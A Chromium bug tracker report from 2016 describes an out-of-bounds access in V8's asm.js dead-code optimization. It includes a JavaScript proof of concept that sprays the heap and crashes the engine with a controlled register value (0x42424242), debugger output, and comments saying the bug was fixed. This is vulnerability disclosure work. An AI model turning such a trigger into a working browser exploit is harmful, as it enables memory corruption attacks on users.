Security: v8 OOB access when optimizing in asm.js
Reported by
cwhan.t...@gmail.com,
Jul 21 2016
Issue description
VULNERABILITY DETAILS
In asm.js, when dead code creates an array with no arguments,
the early optimization phase makes a bad node that has a mismatch
between the total and the actual number of node inputs. Thus, an uninitialized
element is accessed over the boundary.
VERSION
Chrome 5.2.361.43 (stable)
V8 5.2.361.43 (32 bit)
REPRODUCTION CASE
===================================================
// Allocate many short-lived strings so that a GC is likely to run
// between calls to go().
function myGC() {
    for (var i = 0; i < ((1024 * 1024) / 0x10); i++)
        var a = new String();
}

go = (function(stdlib, foreign, heap) {
    "use asm";
    var ff = Array;
    var Int32ArrayView = new stdlib.Int32Array(heap);
    function f() {
        // Spray the heap with 0x42 bytes; this is the value that later
        // shows up in eax when the bad node is dereferenced.
        var arr = new Array(1024);
        for (var i = 0; i < 1000; i++)
            arr.push(new stdlib.Uint8Array(1024).fill(0x42)); // memory corrupting
        local = ff(); // <-------------------- This makes a crash
        return Int32ArrayView[0];
    }
    return f;
})(this, {}, new ArrayBuffer(4096));

// Call go() repeatedly so that f() gets optimized.
for (var i = 0; i < 400; i++) {
    myGC();
    go();
}
================================================
$ gdb -q --args ../../../v8_norm/out/ia32.release/d8 c3.js
Reading symbols from ../../../v8_norm/out/ia32.release/d8...(no debugging symbols found)...done.
(gdb) r
...
Program received signal SIGSEGV, Segmentation fault.
0x085ab1cc in v8::internal::compiler::DeadCodeElimination::Reduce(v8::internal::compiler::Node*) ()
(gdb) x/i $pc
=> 0x85ab1cc <_ZN2v88internal8compiler19DeadCodeElimination6ReduceEPNS1_4NodeE+92>: mov ecx,DWORD PTR [eax]
(gdb) i r eax
eax 0x42424242 1111638594
--------------------------------------------
$ ../../../v8_norm/out/ia32.debug/d8 c3.js
#
# Fatal error in ../src/compiler/verifier.cc, line 1317
# Check failed: OperatorProperties::GetTotalInputCount(node->op()) == node->InputCount() (9 vs. 8).
#
==== C stack trace ===============================
1: V8_Fatal
2: v8::internal::compiler::Verifier::VerifyNode(v8::internal::compiler::Node*)
3: v8::internal::compiler::NodeProperties::ChangeOp(v8::internal::compiler::Node*, v8::internal::compiler::Operator const*)
4: v8::internal::compiler::JSGenericLowering::LowerJSCreateArray(v8::internal::compiler::Node*)
5: v8::internal::compiler::JSGenericLowering::Reduce(v8::internal::compiler::Node*)
6: v8::internal::compiler::GraphReducer::Reduce(v8::internal::compiler::Node*)
7: v8::internal::compiler::GraphReducer::ReduceTop()
8: v8::internal::compiler::GraphReducer::ReduceNode(v8::internal::compiler::Node*)
...
Jul 22 2016
Looks like mvstanton@ fixed this with https://codereview.chromium.org/2127713003
Jul 22 2016
I cannot reproduce and it appears this was fixed. If the reporter can reproduce on a latest checkout of V8, please re-send this bug with additional instructions to reproduce. Thank you.
Oct 29 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by kerrnel@chromium.org, Jul 21 2016
Owner: bmeu...@chromium.org